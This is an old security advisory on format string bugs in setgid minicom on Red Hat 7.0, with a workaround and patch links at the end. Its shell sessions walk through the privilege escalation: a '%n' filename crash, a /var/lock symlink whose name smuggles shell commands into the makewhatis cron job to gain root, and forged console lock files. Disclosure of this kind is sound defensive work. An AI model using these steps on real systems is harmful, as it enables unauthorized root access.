COMMAND

    minicom

SYSTEMS AFFECTED

    RedHat 7.0

PROBLEM

    Zenith Parsec found following.  Minicom has multiple format string
    bugs:

        - ulog()
        - werror()

    Any user  who has  access to  a correctly  configured, setgid uucp
    minicom can potentially  gain root access  within 24 hrs,  or have
    console  access  (as  determined  by  PAM)  and  be  able to cause
    shutdown of the machine immediately.

    This affects Redhat 7.0, almost definately earlier based on  dates
    in sourcecode comments.  This may not be a security hole on  other
    distributions.   Depends on  if its  setuid/setgid.   Root exploit
    does exist.

    If minicom  -s hasn't  been run  as root  prior, then this exploit
    will probably not work.

        [root@clarity src]# whatis minicom
        minicom              (1)  - friendly serial communication program
        [root@clarity /root]# rpm -qf `which minicom`
        minicom-1.83.1-4
        [root@clarity src]# ll `which minicom`
        -rwxr-sr-x    1 root     uucp       171452 Jan 30 05:54 /usr/bin/minicom*
        [root@clarity src]# cd /usr/src/redhat/SOURCES/minicom-1.83.1/src
        [root@clarity src]# grep do_log common.c|grep -v "%"
        common.c: *             void do_log(char *)     - write a line to the logfile
        common.c: * 27.10.98 jl  converted do_log to use stdarg
        common.c:void do_log(char *line, ...)
        common.c:void do_log(char *line, ...)
        [root@clarity src]# grep do_log updown.c
            do_log(cmdline);   /* jl 22.06.97 */
                                do_log (trimbuf);
                              do_log(trimbuf);
            do_log (trimbuf);

    should be:

            do_log("%s",cmdline);   /* jl 22.06.97 */
                                do_log ("%s",trimbuf);
                              do_log("%s",trimbuf);
            do_log ("%s",trimbuf);

    and others  are spread  through the  code that  ZP hasn't checked,
    but should probably be fixed.

    updown.c contains the  code for the  uploading and downloading  of
    files.  cmdline  contains the command  that it executes  to upload
    and download files. Part of the command is of course the filename.

        [root@clarity src]# touch ~/%n
        [root@clarity src]# ll ~/%n
        -rw-r--r--    1 root     root            0 Apr 11 11:26 /root/%n

    Using root to demonstrate problem so we can gdb the sgid program.

        [root@clarity src]# gdb minicom
        GNU gdb 5.0
        Copyright 2000 Free Software Foundation, Inc.
        GDB is free software, covered by the GNU General Public License, and you are
        welcome to change it and/or distribute copies of it under certain conditions.
        Type "show copying" to see the conditions.
        There is absolutely no warranty for GDB.  Type "show warranty" for details.
        This GDB was configured as "i386-redhat-linux"...
        (no debugging symbols found)...
        (gdb) r
        Starting program: /usr/bin/minicom
        minicom: WARNING: please don't run minicom as root when not maintaining
                          it (with the -s switch) since all changes to the
                          configuration will be GLOBAL !.

    Screen clears... initializing modem message...

        Welcome to minicom 1.83.1

        OPTIONS: History Buffer, F-key Macros, Search History Buffer, I18n
        Compiled on Aug 24 2000, 10:09:47.

        Press CTRL-A Z for help on special keys

    press ^A S ,select xmodem, then move the cursor down to %n,  press
    space to tag it and then press return...

        (no debugging symbols found)...
        Program received signal SIGSEGV, Segmentation fault.
        0x400b7a17 in _IO_vfprintf (s=0x8080a60,
            format=0xbffff2c0 "/usr/bin/sx -vv %n", ap=0xbffff248)
            at ../sysdeps/i386/i486/bits/string.h:539
        539     ../sysdeps/i386/i486/bits/string.h: No such file or directory.
        (gdb) q

    Ok, big deal. You get gid uucp if you exploit it.

        [root@clarity src]# cd /var/lock
        [root@clarity lock]# ls -Flatrck
        total 20
        drwxr-xr-x   19 root     root         4096 Apr  5 02:35 ../
        drwxrwxr-x    2 root     root         4096 Apr  7 12:10 subsys/
        drwxr-xr-x    2 root     root         4096 Apr  9 13:16 console/
        drwxrwxr-x    4 root     uucp         4096 Apr 11 11:31 ./

    writable by gid uucp.. ok

        [root@clarity lock]# cat /etc/cron.daily/makewhatis.cron
        #!/bin/bash

        LOCKFILE=/var/lock/makewhatis.lock

        # the lockfile is not meant to be perfect, it's just in case the
        # two makewhatis cron scripts get run close to each other to keep
        # them from stepping on each other's toes.  The worst that will
        # happen is that they will temporarily corrupt the database...
        [ -f $LOCKFILE ] && exit 0
        trap "rm -f $LOCKFILE" EXIT
        touch $LOCKFILE
        makewhatis -u -w
        exit 0

    The worst that  can happen is  someone will exploit  this lockfile
    mechanism for root.

        [root@clarity lock]# su uucp

    or run an exploit against minicom.. the gid is the important part.

        sh-2.04$ id
        uid=10(uucp) gid=14(uucp) groups=14(uucp)
        sh-2.04$ ln -s "/usr/share/man/man1/ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;getroot;echo .1.gz" /var/lock/makewhatis.lock
        sh-2.04$ ls -al
        total 16
        drwxrwxr-x    4 root     uucp         4096 Apr 11 11:41 .
        drwxr-xr-x   19 root     root         4096 Apr  5 02:35 ..
        drwxr-xr-x    2 root     root         4096 Apr  9 13:16 console
        lrwxrwxrwx    1 uucp     uucp           91 Apr 11 11:41 makewhatis.lock -> /usr/share/man/man1/ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;getroot;echo .1.gz
        drwxrwxr-x    2 root     root         4096 Apr  7 12:10 subsys

    ok... what is happening? checkout /usr/sbin/makewhatis.

        pipe_cmd = "zcat " filename;

    if the filename contains  shell commands, they will  be exectuted.
    not  normally  a  problem,  as  what  manpages have embedded shell
    commands?  Malicious ones, like this.   The echo on the end is  to
    prevent it from returning an  error from the command.   The export
    PATH=. is because we can't  put any / characters in  the filename.
    Well     that     will     get     you     root     next      time
    /etc/cron.daily/makewhatos.cron runs. what else ...

        sh-2.04$ rm makewhatis.lock
        sh-2.04$ echo -n uucp>console.lock
        sh-2.04$ mv console oldconsole
        sh-2.04$ mkdir console;touch console/uucp

    Now we are at the console(according to PAM anyway).  Halt anyone?

SOLUTION

    Work around: chmod -s /usr/bin/minicom

    For Immunix OS:

        http://download.immunix.org/ImmunixOS/6.2/updates/RPMS/minicom-1.83.1-1.0.6x_StackGuard.i386.rpm
        http://download.immunix.org/ImmunixOS/6.2/updates/SRPMS/minicom-1.83.1-1.0.6x_StackGuard.src.rpm
        http://download.immunix.org/ImmunixOS/7.0/updates/RPMS/minicom-1.83.1-8_imnx.i386.rpm
        http://download.immunix.org/ImmunixOS/7.0/updates/SRPMS/minicom-1.83.1-8_imnx.src.rpm